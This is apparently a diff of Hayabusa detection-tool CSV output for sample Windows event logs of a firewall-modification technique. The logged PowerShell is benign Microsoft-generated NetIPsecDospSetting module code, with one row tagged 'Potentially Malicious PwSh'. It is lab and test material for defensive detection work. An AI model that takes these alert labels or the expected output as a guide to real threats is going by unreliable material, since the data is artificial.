[Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecUnauthPerIPRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6IPsecUnauthPerIPRateLimitBytesPerSec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthPerIPRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthPerIPRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecAuthDscp')) { [object]$__cmdletization_value = ${IpV6IPsecAuthDscp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecAuthDscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecAuthDscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecAuthRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6IPsecAuthRateLimitBytesPerSec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecAuthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecAuthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IcmpV6Dscp')) { [object]$__cmdletization_value = ${IcmpV6Dscp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IcmpV6Dscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IcmpV6Dscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IcmpV6RateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IcmpV6RateLimitBytesPerSec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IcmpV6RateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IcmpV6RateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6FilterExemptDscp')) { [object]$__cmdletization_value = ${IpV6FilterExemptDscp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6FilterExemptDscp'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6FilterExemptDscp'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6FilterExemptRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6FilterExemptRateLimitBytesPerSec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6FilterExemptRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6FilterExemptRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DefBlockExemptDscp')) { [object]$__cmdletization_value = ${DefBlockExemptDscp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DefBlockExemptDscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DefBlockExemptDscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DefBlockExemptRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${DefBlockExemptRateLimitBytesPerSec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DefBlockExemptRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DefBlockExemptRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MaxStateEntries')) { [object]$__cmdletization_value = ${MaxStateEntries} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxStateEntries'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxStateEntries'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MaxPerIPRateLimitQueues')) { [object]$__cmdletization_value = ${MaxPerIPRateLimitQueues} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxPerIPRateLimitQueues'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxPerIPRateLimitQueues'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EnabledKeyingModules')) { [object]$__cmdletization_value = ${EnabledKeyingModules} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EnabledKeyingModules'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospKeyModules'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EnabledKeyingModules'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospKeyModules'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('FilteringFlags')) { [object]$__cmdletization_value = ${FilteringFlags} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'FilteringFlags'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospFlags'; Bindings = 'In'; Value = $__cmdletization_valu,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:45.444 +09:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"e; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'FilteringFlags'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospFlags'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PublicInterfaceAliases')) { [object]$__cmdletization_value = ${PublicInterfaceAliases} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PublicInterfaceAliases'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PublicInterfaceAliases'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PrivateInterfaceAliases')) { [object]$__cmdletization_value = ${PrivateInterfaceAliases} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PrivateInterfaceAliases'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PrivateInterfaceAliases'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PublicV6Address')) { [object]$__cmdletization_value = ${PublicV6Address} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PublicV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PublicV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PrivateV6Address')) { [object]$__cmdletization_value = ${PrivateV6Address} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PrivateV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PrivateV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecDospSetting.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetIPsecDospSetting' -Alias '*' function Remove-NetIPsecDospSetting { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIPsecDoSPSetting')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIPsecDoSPSetting')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('ElementName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecDospSetting.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Remove-NetIPsecDospSetting' -Alias '*'",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:45.444 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"e; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'FilteringFlags'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospFlags'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PublicInterfaceAliases')) { [object]$__cmdletization_value = ${PublicInterfaceAliases} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PublicInterfaceAliases'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PublicInterfaceAliases'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PrivateInterfaceAliases')) { [object]$__cmdletization_value = ${PrivateInterfaceAliases} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PrivateInterfaceAliases'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PrivateInterfaceAliases'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PublicV6Address')) { [object]$__cmdletization_value = ${PublicV6Address} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PublicV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PublicV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PrivateV6Address')) { [object]$__cmdletization_value = ${PrivateV6Address} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PrivateV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PrivateV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecDospSetting.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetIPsecDospSetting' -Alias '*' function Remove-NetIPsecDospSetting { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIPsecDoSPSetting')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIPsecDoSPSetting')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('ElementName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecDospSetting.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Remove-NetIPsecDospSetting' -Alias '*'",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:45.445 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:45.449 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
